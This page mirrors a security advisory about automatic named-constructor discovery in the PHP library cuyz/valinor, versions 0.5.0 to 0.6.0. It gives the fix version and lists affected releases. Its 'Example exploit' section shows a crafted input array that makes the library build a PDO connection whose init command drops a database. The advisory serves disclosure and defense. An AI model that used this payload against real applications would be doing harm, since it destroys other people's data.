Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS14aHI4LW1wd3EtMnJyMs03nw
Automatic named constructor discovery in Valinor
Design issue - automatic constructor discovery
The issue arises when upgrading from cuyz/valinor:0.3.0 to a newer system on an existing application, which broke due to the wrong constructor being picked.
Still, a bigger security concern is problematic, and it is akin to https://github.com/rails/rails/issues/5228.
Example exploit
Take following DTO example:
final class UserDTO
{
public function __construct(
public int $id,
public string $name
) {}
public static function fromDb(
PDO $connection,
int $id
): self { /* ... code to fetch the DTO here ... */ }
}
There is nothing inherently unsafe about the above UserDTO, but when mixed with cuyz/valinor:^0.5.0 ( specifically https://github.com/CuyZ/Valinor/commit/718d3c1bc2ea7d28b4b1f6c062addcd1dde8660b ), it is an explosive mix:
// this could be coming from user input:
$maliciousPayload = [
'connection' => [
'dsn' => 'mysql:host=some-host;database=some-database',
'username' => 'root',
'password' => 'root',
'options' => [
// PDO::MYSQL_ATTR_INIT_COMMAND === 1002
1002 => 'DROP DATABASE all-the-moneys'
]
],
'id' => 123,
];
$treeMapper->map(
UserDTO::class,
$maliciousPayload
); // your DB is gone :D
The above payload is represented in PHP form, but may as well be input JSON, HTML or x-form-urlencoded.
Mitigation
Version 0.7.0 contains a patch for this issue.
Automatic named constructor resolution should be disabled - only explicitly mapped named constructors should be used/discovered.
Permalink: https://github.com/advisories/GHSA-xhr8-mpwq-2rr2JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14aHI4LW1wd3EtMnJyMs03nw
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 2 years ago
Updated: over 1 year ago
Identifiers: GHSA-xhr8-mpwq-2rr2
References:
- https://github.com/CuyZ/Valinor/security/advisories/GHSA-xhr8-mpwq-2rr2
- https://github.com/CuyZ/Valinor/commit/718d3c1bc2ea7d28b4b1f6c062addcd1dde8660b
- https://github.com/CuyZ/Valinor/releases/tag/0.7.0
- https://github.com/advisories/GHSA-xhr8-mpwq-2rr2
Blast Radius: 0.0
Affected Packages
packagist:cuyz/valinor
Dependent packages: 31Dependent repositories: 21
Downloads: 957,735 total
Affected Version Ranges: >= 0.5.0, < 0.7.0
Fixed in: 0.7.0
All affected versions: 0.5.0, 0.6.0
All unaffected versions: 0.1.0, 0.1.1, 0.2.0, 0.3.0, 0.4.0, 0.7.0, 0.8.0, 0.9.0, 0.10.0, 0.11.0, 0.12.0, 0.13.0, 0.14.0, 0.15.0, 0.16.0, 0.17.0, 0.17.1, 1.0.0, 1.1.0, 1.2.0, 1.3.0, 1.3.1, 1.4.0, 1.5.0, 1.6.0, 1.6.1, 1.7.0, 1.8.0, 1.8.1, 1.8.2, 1.9.0, 1.10.0, 1.11.0, 1.12.0